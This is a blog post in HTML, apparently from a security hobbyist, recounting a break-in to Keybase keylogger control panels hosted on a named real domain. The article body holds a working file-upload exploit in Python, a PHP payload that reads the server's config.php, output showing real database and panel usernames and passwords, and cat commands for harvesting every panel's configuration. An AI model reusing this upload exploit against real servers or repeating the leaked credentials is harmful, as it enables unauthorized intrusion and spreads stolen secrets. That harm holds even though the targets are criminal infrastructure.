<!DOCTYPE html>
<html>

    <head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>1 panel, 2 panels, 3 panels...</title>
<meta name="description" content="Software is like underwear. Update it regularly.">

<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css">
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css">
<link rel="stylesheet" type="text/css" media="all" href="/css/style.css" />
<link rel="stylesheet" type="text/css" media="all" href="/css/jquery.mmenu.all.css" />
<link rel="stylesheet" href="/css/highlightjs.piperita.css">

<!-- Favicons generated at http://realfavicongenerator.net/ -->
<link rel="apple-touch-icon" sizes="57x57" href="/favicons/apple-touch-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/favicons/apple-touch-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/favicons/apple-touch-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/favicons/apple-touch-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/favicons/apple-touch-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/favicons/apple-touch-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/favicons/apple-touch-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/favicons/apple-touch-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/favicons/apple-touch-icon-180x180.png">
<link rel="icon" type="image/png" href="/favicons/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="/favicons/android-chrome-192x192.png" sizes="192x192">
<link rel="icon" type="image/png" href="/favicons/favicon-96x96.png" sizes="96x96">
<link rel="icon" type="image/png" href="/favicons/favicon-16x16.png" sizes="16x16">
<link rel="manifest" href="/favicons/manifest.json">
<link rel="shortcut icon" href="/favicons/favicon.ico">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-TileImage" content="/favicons/mstile-144x144.png">
<meta name="msapplication-config" content="/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


</head>


    <body>

    <nav id="my-menu">
  <div>
    <p>MisterChOc</p>

    <ul class="pages">
      <li><a href="/"><i class="fa fa-home"></i> Home</a></li>
      <li><a href="/posts/"><i class="fa fa-archive"></i> All Posts</a></li>
      <li><a href="/search/"><i class="fa fa-search"></i> Search</a></li>
    </ul>

    <p class="links">
  <a href="http://www.twitter.com/misterch0c" target="_new"><i class="fa fa-twitter"></i></a>
  
  
  <a href="https://github.com/misterch0c" target="_new"><i class="fa fa-github-alt"></i></a>
  
  <a href="/feed.xml" target="_new"><i class="fa fa-rss"></i></a>
</p>

  </div>
</nav>
<div class="menu-button" href="#menu"><i class="fa fa-bars"></i></div>


    <div class="page-content">
      <div class="wrap">
      

<div class="container-fluid single">
  <div class="row">

    <div itemscope itemtype="http://schema.org/Article" class="col-md-12 article">
      
      <div class="thumb">
        <i class="fa fa-cogs fa-4x"></i>
      </div>
      

      <h1 class="header" itemprop="name">1 panel, 2 panels, 3 panels...</h1>

      <div class="author">
        <small><i>
          
          on <span itemprop="datePublished" content="2014-08-28">January 16, 2016</span>
           under jekyll
        </i></small>
      </div>

      <div class="read-time">
        <small>
          2 minute read
        </small>
      </div>

      <div class="content-panel content">
        <span itemprop="articleBody"><h1>1 panel, 2 panels, 3 panels...</h1>

<p>I was hanging out on <a href="http://cybercrime-tracker.net/">Cybercrime-Tracker</a> and noticed some Keybase panels. I never heard of that one before so I decided to take a look.
Turns out Keybase is not a botner but rather a keylogger, it can also take screenshot of the victim&#39;s desktop.</p>

<p>One of the domain was still up and there was 3 Keybase panels listed on Cybercrime Tracker:</p>

<ul>
<li><a href="http://www.omarabdulaziz.com/golden/login.php">www.omarabdulaziz.com/golden/login.php</a><br></li>
<li><a href="http://www.omarabdulaziz.com/daniel/login.php">www.omarabdulaziz.com/daniel/login.php</a><br></li>
<li><a href="http://www.omarabdulaziz.com/ugo/login.php">www.omarabdulaziz.com/ugo/login.php</a><br></li>
</ul>

<p><img src="http://i.imgur.com/gxIIlJ1.png" alt=""></p>

<p>The first fail is that permission are not checked on the <code>/image/Imaged</code> directory, therefore anyone aware of this can access the screenshots:</p>

<p><img src="http://i.imgur.com/1DYLZ2I.png" alt=""></p>

<p>The first two panels didn&#39;t have the <code>/images/upload.php</code> file but luckily for me the <code>ugo</code> did.
<a href="http://researchcenter.paloaltonetworks.com/author/unit-42/">Unit 32</a> already found some nice vulnerabilities in the Keybase source code so I tried it.</p>

<p>I ran this python script with the next file as argument.</p>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">2</span><span class="p">:</span>
    <span class="k">print</span> <span class="s">"Usage: </span><span class="si">%</span><span class="s">s [php_file]"</span> <span class="o">%</span> <span class="n">__file__</span>
    <span class="n">sys</span><span class="o">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

<span class="n">URL</span> <span class="o">=</span> <span class="s">"http://www.omarabdulaziz.com/ugo/"</span>
<span class="k">print</span> <span class="s">"Sending request..."</span>

<span class="n">multiple_files</span> <span class="o">=</span> <span class="p">[(</span><span class="s">'file'</span><span class="p">,</span> <span class="p">(</span><span class="s">'owned.php'</span><span class="p">,</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="s">'rb'</span><span class="p">)))]</span>

<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">URL</span> <span class="o">+</span> <span class="s">"image/upload.php"</span><span class="p">,</span> <span class="n">files</span><span class="o">=</span><span class="n">multiple_files</span><span class="p">)</span>
<span class="k">print</span> <span class="n">r</span>
<span class="k">print</span> <span class="s">"Results:"</span>
<span class="k">print</span>

<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">URL</span> <span class="o">+</span> <span class="s">"image/Images/owned.php"</span><span class="p">)</span>

<span class="k">print</span> <span class="n">r</span><span class="o">.</span><span class="n">text</span></code></pre></figure>

<figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span>
    <span class="nv">$file</span> <span class="o">=</span> <span class="s1">'../../config.php'</span><span class="p">;</span>

    <span class="k">echo</span> <span class="s2">"It works!"</span><span class="o">.</span><span class="s2">"&lt;/br&gt;"</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="nb">file_exists</span><span class="p">(</span><span class="nv">$file</span><span class="p">))</span> <span class="p">{</span>
        <span class="k">echo</span> <span class="s2">"Reading file"</span><span class="o">.</span><span class="s2">"&lt;/br&gt;"</span><span class="p">;</span>
        <span class="k">echo</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="nv">$file</span><span class="p">);</span>
    <span class="p">}</span>
<span class="cp">?&gt;</span></code></pre></figure>

<p>Here&#39;s the result:</p>

<figure class="highlight"><pre><code class="language-php" data-lang="php">Sending request...
<span class="nt">&lt;Response</span> <span class="err">[</span><span class="na">200</span><span class="err">]</span><span class="nt">&gt;</span>
Results:

It works!<span class="nt">&lt;/br&gt;</span>Reading file<span class="nt">&lt;/br&gt;</span><span class="cp">&lt;?php</span>
<span class="nb">ob_start</span><span class="p">();</span>
<span class="c1">//Edit your database details
</span>
<span class="nv">$mysql_host</span> <span class="o">=</span> <span class="s2">"localhost"</span><span class="p">;</span>
<span class="nv">$mysql_database</span> <span class="o">=</span> <span class="s2">"omarabdu_ugo"</span><span class="p">;</span>
<span class="nv">$mysql_user</span> <span class="o">=</span> <span class="s2">"omarabdu_ugo"</span><span class="p">;</span>
<span class="nv">$mysql_password</span> <span class="o">=</span> <span class="s2">"joinkrama2"</span><span class="p">;</span>

<span class="c1">//These are for accessing your web-panel. You can change these any time.
</span>
<span class="nv">$panelusername</span> <span class="o">=</span> <span class="s2">"admin"</span><span class="p">;</span>
<span class="nv">$panelpassword</span> <span class="o">=</span> <span class="s2">"ugo12345"</span><span class="p">;</span>

<span class="cp">?&gt;</span></code></pre></figure>

<p>So of course... I got in</p>

<p><img src="http://i.imgur.com/YQDieYq.png" alt=""></p>

<p>That&#39;s pretty cool, but are all the panels of this domain actually listed on cybercrime-tracker? I took a look at the public_html folder and found additional panels:</p>

<ul>
<li><a href="http://www.omarabdulaziz.com/chuks/login.php">http://www.omarabdulaziz.com/chuks/login.php</a></li>
<li><a href="http://www.omarabdulaziz.com/panel2/login.php">http://www.omarabdulaziz.com/panel2/login.php</a></li>
<li><a href="http://www.omarabdulaziz.com/nonso/login.php">http://www.omarabdulaziz.com/nonso/login.php</a></li>
<li><a href="http://www.omarabdulaziz.com/owerri/login.php">http://www.omarabdulaziz.com/owerri/login.php</a></li>
</ul>

<p>So you got it... Since we got cmd exec we can get the passwords for all the panels at once:</p>

<figure class="highlight"><pre><code class="language-bash" data-lang="bash">cat /home/omarabdu/public_html/ugo/config.php &amp;
cat /home/omarabdu/public_html/daniel/config.php &amp;
cat /home/omarabdu/public_html/golden/config.php &amp;
cat /home/omarabdu/public_html/chuks/config.php &amp;
cat /home/omarabdu/public_html/panel2/config.php &amp;
cat /home/omarabdu/public_html/owerri/config.php
cat /home/omarabdu/public_html/nonso/config.php</code></pre></figure>

<p><img src="http://www.reactiongifs.com/wp-content/uploads/2013/02/lolol.gif" alt=""></p>
</span>

        

        
        <div class="tags">
          <small>
          <i class="fa fa-tags"></i>
            keybase, c&c, botnet, malware
          </small>
        </div>
        

      </div>

      <div class="content-panel feedback">
        I <i class="fa fa-heart"></i> feedback.<br />
        Let me know what you think of this article on twitter <a href="http://www.twitter.com/misterch0c">@misterch0c</a> or leave a comment below!
      </div>

      
      <div class="content-panel comments">
        <div id="disqus_thread">
          <noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
          <a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
        </div>
      </div>
      

      

    </div>

  </div>

</div>


<script type="text/javascript">
/* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
function disqus_config() { this.experiment.enable_scroll_container = true; }
var disqus_shortname = "misterch0c"; // required: replace example with your forum shortname
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
  var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
  dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
  (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>


      </div>
    </div>

    <div class="footer clearfix">
  <div class="col-md-6">
    
  </div>
  <div class="col-md-6">
    &lt;/&gt; on <a href="https://github.com/jacobtomlinson/carte-noire">Github</a> &nbsp;<i class="fa fa-github-alt"></i>
  </div>
</div>

<script src="//code.jquery.com/jquery-1.11.0.min.js"></script>
<script src="//netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js"></script>
<script src="/js/jquery.mmenu.min.all.js"></script>
<script src="http://cdnjs.cloudflare.com/ajax/libs/highlight.js/8.7/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
<script type="text/javascript">
   $(document).ready(function() {
      $("#my-menu").mmenu().on( "closed.mm", function() {
            $(".menu-button").show();
         });
      $(".menu-button").click(function() {
        $(".menu-button").hide();
        $("#my-menu").trigger("open.mm");
      });
   });
</script>


<script type="text/javascript">
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-43267317-1']);
          _gaq.push(['_trackPageview']);
  (function () {
      var ga = document.createElement('script');
      ga.type = 'text/javascript';
      ga.async = true;
      ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

      var s = document.getElementsByTagName('script')[0];
      s.parentNode.insertBefore(ga, s);
  })();
</script>



    </body>
</html>
